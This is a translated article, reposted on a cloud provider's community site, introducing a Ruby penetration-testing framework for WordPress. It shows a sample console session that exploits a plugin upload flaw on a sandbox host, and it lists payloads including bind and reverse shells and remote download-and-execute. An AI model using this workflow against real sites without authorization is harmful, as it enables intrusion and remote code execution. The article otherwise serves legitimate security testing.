Ruby Framework for penetration testing WordPress websites and systems: WordPress Exploit Framework

Source: Internet
Author: User

Ruby Framework for penetration testing WordPress websites and systems: WordPress Exploit Framework

This Ruby framework contains some modules that can penetration test WordPress websites and systems. Users can also develop their own modules to expand their functions.
What are the conditions for running it?
Make sure Ruby 2.2.x is installed on the system. Open a command line window, switch the current directory to the WPXF folder, and run the command "bundle install". If no bundler is installed on your system, run the "gem install bundler" command to install the SDK.
How to use it?
Open a command line window, switch to the current directory, and download and save the WordPress Exploit Framework path. Run the "ruby wpxf. rb" command to start it.
Once the wpxf is loaded, A wpxf prompt will appear. You can use the "search" command to search for the module and use the "use" command to load the module.
After the module is loaded into the program running environment, you can use the "set" command to set the option parameters, and use the "info" command to view information about the module.
The following is an example. Load the "symposium_shell_upload" vulnerability exploitation module, set the module and load parameters, and finally execute this vulnerability to exploit the module to attack the target.
Wpxf> use exploit/symposium_shell_upload
[+] Loaded module :#
Wpxf [exploit/symposium_shell_upload]> set host wp-sandbox
[+] Set host => wp-sandbox
Wpxf [exploit/symposium_shell_upload]> set target_uri/wordpress/
[+] Set target_uri =>/wordpress/
Wpxf [exploit/symposium_shell_upload]> set payload exec
[+] Loaded payload :#
Wpxf [exploit/symposium_shell_upload]> set cmd echo "Hello, world! "
[+] Set cmd => echo "Hello, world! "
Wpxf [exploit/symposium_shell_upload]> run
[-] Preparing payload...
[-] Uploading the payload...
[-] Executing the payload...
[+] Result: Hello, world!
[+] Execution finished successfully
You can obtain a list of all commands on github.
What are the differences between the auxiliary module and the vulnerability exploitation module?
The auxiliary module does not allow you to run attack loads on the target machine. However, it can parse the target information, improve permissions, or provide denial-of-service functions.
The vulnerability exploitation module requires you to specify an attack load, which will be executed on the target machine. You can execute any code on the target machine to extract information, create a remote shell or other things you want to do on the Web server.
What are the available loads?
Bind_php: Upload a script to listen on a specific port and allow WPXF to establish a remote shell;
Custom: Upload and execute a customized PHP script;
Download_exec: download and run a remote executable file;
Exec: run a shell command on the remote server and return the result to the WPXF session;
Reverse_tcp: Upload a script that can establish anti-TCP shell;
Except for "custom", all these loads will be deleted after execution to avoid being left on the target machine after use or failure to establish a shell connection.
How to write your own modules and loads?
You can find the compiling module and Loading Method on Github. All the API documents are in Getwpxf.
You can download Wordpress-Exploit-Framework from github.

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.